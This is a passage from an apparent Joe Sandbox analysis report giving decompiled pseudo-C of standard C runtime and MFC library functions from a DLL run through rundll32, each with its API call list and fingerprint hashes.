                                                                        								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
                                                                        								__eflags = _t74;
                                                                        								 *((intOrPtr*)(_t129 + 8)) = _t74;
                                                                        								if(_t74 < 0) {
                                                                        									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
                                                                        									_v12 = _v12 + 0xffffffe8;
                                                                        									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                        								}
                                                                        								_t75 = E10013780(_v12, _v8, 0x18, 0);
                                                                        								__eflags = _t118;
                                                                        								_v12 = _t75;
                                                                        								_v8 = _t118;
                                                                        								if(__eflags > 0) {
                                                                        									goto L28;
                                                                        								} else {
                                                                        									if(__eflags < 0) {
                                                                        										L25:
                                                                        										asm("cdq");
                                                                        										_t111 = 7;
                                                                        										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
                                                                        										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
                                                                        										_t79 =  *((intOrPtr*)(_t129 + 0xc));
                                                                        										__eflags = _t79;
                                                                        										if(_t79 > 0) {
                                                                        											_t60 = _t129 + 0x1c;
                                                                        											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
                                                                        											__eflags =  *_t60;
                                                                        										} else {
                                                                        											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
                                                                        											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
                                                                        											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
                                                                        											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
                                                                        										}
                                                                        										goto L28;
                                                                        									}
                                                                        									__eflags = _t75;
                                                                        									if(_t75 >= 0) {
                                                                        										goto L28;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        							}
                                                                        							_push(_t129);
                                                                        							_t85 = E10019447(0, _t121, _t129, __eflags);
                                                                        							__eflags = _t85;
                                                                        							if(_t85 == 0) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t113 =  *0x1004cdf0; // 0xfffff1f0
                                                                        							_t86 =  *0x1004cde8; // 0x7080
                                                                        							asm("cdq");
                                                                        							asm("cdq");
                                                                        							asm("sbb edx, edi");
                                                                        							_v12 =  *_t129 - _t86 + _t113;
                                                                        							_v8 = _t118;
                                                                        							 *((intOrPtr*)(_t129 + 0x20)) = 1;
                                                                        							_t123 = _v8;
                                                                        							_t105 = _v12;
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_t90 =  *0x1004cde8; // 0x7080
                                                                        							asm("cdq");
                                                                        							asm("sbb ecx, edx");
                                                                        							_v12 = _t128 - _t90;
                                                                        							_v8 = _t102;
                                                                        							_t92 = E10018BEF( &_v12);
                                                                        							_t138 =  *0x1004cdec; // 0x1
                                                                        							_t129 = _t92;
                                                                        							if(_t138 != 0) {
                                                                        								_push(_t129);
                                                                        								if(E10019447(0, _t121, _t129, _t138) != 0) {
                                                                        									_t94 =  *0x1004cdf0; // 0xfffff1f0
                                                                        									asm("cdq");
                                                                        									_v12 = _v12 - _t94;
                                                                        									asm("sbb [ebp-0x4], edx");
                                                                        									_t129 = E10018BEF( &_v12);
                                                                        									 *((intOrPtr*)(_t129 + 0x20)) = 1;
                                                                        								}
                                                                        							}
                                                                        							L28:
                                                                        							_t63 = _t129;
                                                                        							L30:
                                                                        							return _t63;
                                                                        						}
                                                                        					}
                                                                        					_t135 = _t62;
                                                                        					if(_t62 > 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					goto L6;
                                                                        				}
                                                                        			}







































                                                                        0x100136e7
                                                                        0x100136e7
                                                                        0x100136cb
                                                                        0x100136ce
                                                                        0x100136d1
                                                                        0x100136d4
                                                                        0x100136db
                                                                        0x100136db
                                                                        0x00000000
                                                                        0x100136c9
                                                                        0x100136aa
                                                                        0x100136ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100136ac
                                                                        0x100136a6
                                                                        0x100135a5
                                                                        0x100135a6
                                                                        0x100135ab
                                                                        0x100135ae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100135b0
                                                                        0x100135b6
                                                                        0x100135bd
                                                                        0x100135c4
                                                                        0x100135c7
                                                                        0x100135c9
                                                                        0x100135cc
                                                                        0x100135cf
                                                                        0x100135d6
                                                                        0x100135d9
                                                                        0x00000000
                                                                        0x10013539
                                                                        0x10013539
                                                                        0x1001353e
                                                                        0x10013544
                                                                        0x10013547
                                                                        0x1001354a
                                                                        0x1001354d
                                                                        0x10013552
                                                                        0x10013559
                                                                        0x1001355b
                                                                        0x10013561
                                                                        0x1001356a
                                                                        0x10013570
                                                                        0x10013575
                                                                        0x10013576
                                                                        0x1001357d
                                                                        0x10013585
                                                                        0x10013588
                                                                        0x10013588
                                                                        0x1001356a
                                                                        0x100136ea
                                                                        0x100136ea
                                                                        0x100136f1
                                                                        0x100136f4
                                                                        0x100136f4
                                                                        0x1001352d
                                                                        0x10013518
                                                                        0x1001351a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001351a

                                                                        APIs
                                                                          • Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                        • __allrem.LIBCMT ref: 100135FA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
                                                                        • __allrem.LIBCMT ref: 10013637
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
                                                                        • __allrem.LIBCMT ref: 10013676
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699
                                                                          • Part of subcall function 10019447: __lock.LIBCMT ref: 10019455
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                        • String ID:
                                                                        • API String ID: 1282128132-0
                                                                        • Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                        • Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
                                                                        • Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                        • Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t42;
                                                                        				void* _t43;
                                                                        				short* _t45;
                                                                        				int _t58;
                                                                        				int _t62;
                                                                        				long _t65;
                                                                        				int _t67;
                                                                        				void* _t69;
                                                                        				short* _t77;
                                                                        				short* _t78;
                                                                        				int _t79;
                                                                        				short* _t83;
                                                                        				short* _t84;
                                                                        				void* _t85;
                                                                        				short* _t86;
                                                                        				void* _t91;
                                                                        
                                                                        				_t69 = __ecx;
                                                                        				_push(0x1c);
                                                                        				_push(0x10042730);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t83 = 0;
                                                                        				_t91 =  *0x1004f740 - _t83; // 0x1
                                                                        				if(_t91 == 0) {
                                                                        					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
                                                                        						_t65 = GetLastError();
                                                                        						__eflags = _t65 - 0x78;
                                                                        						if(_t65 == 0x78) {
                                                                        							 *0x1004f740 = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x1004f740 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t42 =  *0x1004f740; // 0x1
                                                                        				if(_t42 == 2 || _t42 == _t83) {
                                                                        					_t67 =  *(_t85 + 0x1c);
                                                                        					__eflags = _t67 - _t83;
                                                                        					if(_t67 == _t83) {
                                                                        						_t67 =  *0x1004f724; // 0x0
                                                                        					}
                                                                        					_t77 =  *(_t85 + 0x18);
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t77 =  *0x1004f734; // 0x0
                                                                        					}
                                                                        					_t43 = E1001A444(_t67, _t67);
                                                                        					__eflags = _t43 - 0xffffffff;
                                                                        					if(_t43 != 0xffffffff) {
                                                                        						__eflags = _t43 - _t77;
                                                                        						if(__eflags == 0) {
                                                                        							L29:
                                                                        							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
                                                                        							__eflags = _t83;
                                                                        							if(__eflags != 0) {
                                                                        								_push(_t83);
                                                                        								E100107C8(_t67, _t78, _t83, __eflags);
                                                                        							}
                                                                        							_t45 = _t78;
                                                                        							goto L32;
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_t85 + 0x10);
                                                                        						_push( *(_t85 + 0xc));
                                                                        						_push(_t43);
                                                                        						_push(_t77);
                                                                        						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
                                                                        						__eflags = _t83;
                                                                        						if(_t83 == 0) {
                                                                        							goto L25;
                                                                        						}
                                                                        						 *(_t85 + 0xc) = _t83;
                                                                        						goto L29;
                                                                        					} else {
                                                                        						goto L25;
                                                                        					}
                                                                        				} else {
                                                                        					if(_t42 != 1) {
                                                                        						L25:
                                                                        						_t45 = 0;
                                                                        						L32:
                                                                        						return E1001254F(_t45);
                                                                        					}
                                                                        					 *(_t85 - 0x24) = _t83;
                                                                        					 *(_t85 - 0x20) = _t83;
                                                                        					if( *(_t85 + 0x18) == _t83) {
                                                                        						_t62 =  *0x1004f734; // 0x0
                                                                        						 *(_t85 + 0x18) = _t62;
                                                                        					}
                                                                        					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
                                                                        					 *(_t85 - 0x28) = _t79;
                                                                        					if(_t79 == 0) {
                                                                        						goto L25;
                                                                        					} else {
                                                                        						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                        						_t68 = _t79 + _t79;
                                                                        						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
                                                                        						 *(_t85 - 0x18) = _t86;
                                                                        						_t84 = _t86;
                                                                        						 *(_t85 - 0x2c) = _t84;
                                                                        						E10011C50(_t84, 0, _t79 + _t79);
                                                                        						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
                                                                        						_t99 = _t84;
                                                                        						if(_t84 != 0) {
                                                                        							L15:
                                                                        							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
                                                                        							if(_t58 != 0) {
                                                                        								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
                                                                        							}
                                                                        							_t102 =  *(_t85 - 0x20);
                                                                        							if( *(_t85 - 0x20) != 0) {
                                                                        								_push(_t84);
                                                                        								E100107C8(_t68, _t79, _t84, _t102);
                                                                        							}
                                                                        							_t45 =  *(_t85 - 0x24);
                                                                        							goto L32;
                                                                        						} else {
                                                                        							_push(_t79);
                                                                        							_push(2);
                                                                        							_t84 = E1001382A(_t68, _t79, _t84, _t99);
                                                                        							if(_t84 == 0) {
                                                                        								goto L25;
                                                                        							}
                                                                        							 *(_t85 - 0x20) = 1;
                                                                        							goto L15;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
                                                                        • GetLastError.KERNEL32 ref: 10018473
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
                                                                        • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3581945363-0
                                                                        • Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                        • Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
                                                                        • Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                        • Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 41%
                                                                        			E1000F210(void* __ecx, void* __edx) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t73;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr* _t89;
                                                                        				intOrPtr* _t92;
                                                                        				intOrPtr* _t94;
                                                                        				void* _t99;
                                                                        				intOrPtr _t109;
                                                                        				intOrPtr _t110;
                                                                        				intOrPtr _t122;
                                                                        				void* _t124;
                                                                        				void* _t126;
                                                                        				void* _t128;
                                                                        				void* _t129;
                                                                        
                                                                        				_t117 = __edx;
                                                                        				E10011BF0(0x1003b066, _t126);
                                                                        				_t129 = _t128 - 0x6c;
                                                                        				_t73 = 0;
                                                                        				_t124 = __ecx;
                                                                        				 *((intOrPtr*)(__ecx + 0x44)) = 1;
                                                                        				 *(_t126 - 0x10) = 0;
                                                                        				 *(_t126 - 0x18) = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
                                                                        					L21:
                                                                        					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
                                                                        					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
                                                                        					return 0;
                                                                        				}
                                                                        				do {
                                                                        					_t104 = _t73 + _t73 * 4 << 3;
                                                                        					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
                                                                        					if(_t109 == 0) {
                                                                        						goto L19;
                                                                        					}
                                                                        					_t110 =  *((intOrPtr*)(_t109 + 4));
                                                                        					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
                                                                        					if(_t110 == 0) {
                                                                        						goto L19;
                                                                        					}
                                                                        					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
                                                                        					do {
                                                                        						_t122 =  *((intOrPtr*)(E10006D96(_t126 - 0x20)));
                                                                        						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
                                                                        						E10011C50(_t126 - 0x78, 0, 0x20);
                                                                        						_t129 = _t129 + 0xc;
                                                                        						E10010592(_t126 - 0x48);
                                                                        						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
                                                                        						_t135 =  *((intOrPtr*)(_t124 + 0x48));
                                                                        						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
                                                                        							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
                                                                        							__eflags = _t85;
                                                                        						} else {
                                                                        							_t99 = E1000ECE8(_t104, _t124, _t117, _t122, _t124, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
                                                                        							 *(_t126 - 4) = 1;
                                                                        							E10010578(_t99, _t126 - 0x48, _t99);
                                                                        							 *(_t126 - 4) = 0;
                                                                        							__imp__#9(_t126 - 0x58);
                                                                        							_t85 = _t126 - 0x48;
                                                                        						}
                                                                        						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
                                                                        						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
                                                                        						 *((intOrPtr*)(_t126 - 0x30)) = 1;
                                                                        						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
                                                                        						 *(_t122 + 0x84) = 1;
                                                                        						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
                                                                        						if(_t89 != 0) {
                                                                        							_t117 = _t126 - 0x1c;
                                                                        							_push(_t126 - 0x1c);
                                                                        							_push(0x10043098);
                                                                        							_push(_t89);
                                                                        							if( *((intOrPtr*)( *_t89))() >= 0) {
                                                                        								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
                                                                        								_t117 = _t126 - 0x38;
                                                                        								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x10043018, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
                                                                        								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
                                                                        								 *((intOrPtr*)( *_t94 + 8))(_t94);
                                                                        								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
                                                                        								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
                                                                        									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
                                                                        								}
                                                                        								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
                                                                        									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
                                                                        								}
                                                                        								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
                                                                        									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
                                                                        								}
                                                                        								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
                                                                        								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
                                                                        							}
                                                                        						}
                                                                        						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
                                                                        						__imp__#9(_t126 - 0x48);
                                                                        					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
                                                                        					_t73 =  *(_t126 - 0x18);
                                                                        					L19:
                                                                        					_t73 = _t73 + 1;
                                                                        					 *(_t126 - 0x18) = _t73;
                                                                        				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
                                                                        				goto L21;
                                                                        			}




















                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000F215
                                                                        • VariantClear.OLEAUT32(?), ref: 1000F2C7
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 1000F348
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 1000F357
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 1000F366
                                                                        • VariantClear.OLEAUT32(00000000), ref: 1000F37B
                                                                          • Part of subcall function 1000ECE8: __EH_prolog.LIBCMT ref: 1000ECED
                                                                          • Part of subcall function 1000ECE8: VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                          • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                        • String ID:
                                                                        • API String ID: 3098219910-0
                                                                        • Opcode ID: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                        • Instruction ID: 75c5e2025475ce32d6cb8a8ad57bceb5efa69f1f793163f183f6db466388bc1f
                                                                        • Opcode Fuzzy Hash: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                        • Instruction Fuzzy Hash: 455117B1900209AFEB14CFA4C884BEEBBB9FF08355F104529E116EB655D774AA45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v17;
                                                                        				char _v18;
                                                                        				signed int _v19;
                                                                        				char _v28;
                                                                        				long _v32;
                                                                        				signed int _v36;
                                                                        				char _v52;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed char _t63;
                                                                        				intOrPtr* _t85;
                                                                        				intOrPtr* _t88;
                                                                        
                                                                        				_t41 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t88 = __ecx;
                                                                        				_push( &_v28);
                                                                        				_push(_a4);
                                                                        				_v8 = _t41;
                                                                        				_push(0x417);
                                                                        				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                        				_t44 = _a8;
                                                                        				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
                                                                        				_v18 = 0;
                                                                        				_v17 = 0;
                                                                        				 *((char*)(_t44 + 0xa)) = 0;
                                                                        				 *((char*)(_t44 + 0xb)) = 0;
                                                                        				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
                                                                        					_v36 = E100202AB(_t88);
                                                                        					E100202DF(_t88, 0x10000000, 0, 0);
                                                                        					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
                                                                        					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
                                                                        					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
                                                                        					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
                                                                        					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
                                                                        					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
                                                                        					_t85 = _a8;
                                                                        					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
                                                                        					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
                                                                        					_t63 =  *((intOrPtr*)(_t85 + 9));
                                                                        					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
                                                                        						_push(1);
                                                                        						_push(0);
                                                                        						goto L7;
                                                                        					} else {
                                                                        						_push( &_v52);
                                                                        						_push(_a4);
                                                                        						_push(0x41d);
                                                                        						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
                                                                        							_push(1);
                                                                        							_push( &_v52);
                                                                        							L7:
                                                                        							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t45, _v8);
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • SendMessageA.USER32 ref: 1002BA88
                                                                        • SendMessageA.USER32 ref: 1002BA94
                                                                        • SendMessageA.USER32 ref: 1002BAA4
                                                                        • SendMessageA.USER32 ref: 1002BAB2
                                                                        • SendMessageA.USER32 ref: 1002BABC
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$InvalidateLongRectWindow
                                                                        • String ID:
                                                                        • API String ID: 74886174-0
                                                                        • Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                        • Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
                                                                        • Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                        • Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E10030A77(void* __ecx, intOrPtr __edx) {
                                                                        				intOrPtr _v8;
                                                                        				struct tagMSG _v32;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t30;
                                                                        				void* _t32;
                                                                        				void* _t34;
                                                                        				void* _t36;
                                                                        				intOrPtr* _t37;
                                                                        				void* _t41;
                                                                        				intOrPtr _t55;
                                                                        				void* _t56;
                                                                        				void* _t57;
                                                                        				void* _t60;
                                                                        				void* _t61;
                                                                        				intOrPtr* _t62;
                                                                        
                                                                        				_t58 = __edx;
                                                                        				_t60 = __ecx;
                                                                        				if(GetCapture() != 0) {
                                                                        					L20:
                                                                        					return 0;
                                                                        				}
                                                                        				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
                                                                        				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
                                                                        					L19:
                                                                        					E100308EB(_t60, _t72);
                                                                        					goto L20;
                                                                        				} else {
                                                                        					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                                                        						_t30 = _v32.message - 0x100;
                                                                        						if(_t30 == 0) {
                                                                        							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                        							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
                                                                        								E1003075A(_t60, _v32.wParam, 1);
                                                                        							}
                                                                        							__eflags = _v32.wParam - 0x1b;
                                                                        							if(__eflags != 0) {
                                                                        								L18:
                                                                        								_t32 = E100220EE(_t61, GetCapture());
                                                                        								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
                                                                        								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        							goto L19;
                                                                        						}
                                                                        						_t34 = _t30 - 1;
                                                                        						if(_t34 == 0) {
                                                                        							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                        							if(__eflags != 0) {
                                                                        								E1003075A(_t60, _v32.wParam, 0);
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        						_t36 = _t34 - 0xff;
                                                                        						if(_t36 == 0) {
                                                                        							_t55 = _v32.pt;
                                                                        							_t58 = _v8;
                                                                        							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                        							_push(_t55);
                                                                        							_push(_t55);
                                                                        							_t37 = _t62;
                                                                        							 *_t37 = _t55;
                                                                        							 *((intOrPtr*)(_t37 + 4)) = _v8;
                                                                        							_t56 = _t60;
                                                                        							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
                                                                        								E1003078E(_t56, 0);
                                                                        							} else {
                                                                        								E100306DB(_t56);
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        						_t41 = _t36;
                                                                        						if(_t41 == 0) {
                                                                        							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                        							_t57 = _t60;
                                                                        							if(__eflags == 0) {
                                                                        								E10030A33(_t61, __eflags);
                                                                        							} else {
                                                                        								E10030930(_t57, _t58, 0, _t60, __eflags);
                                                                        							}
                                                                        							return 1;
                                                                        						}
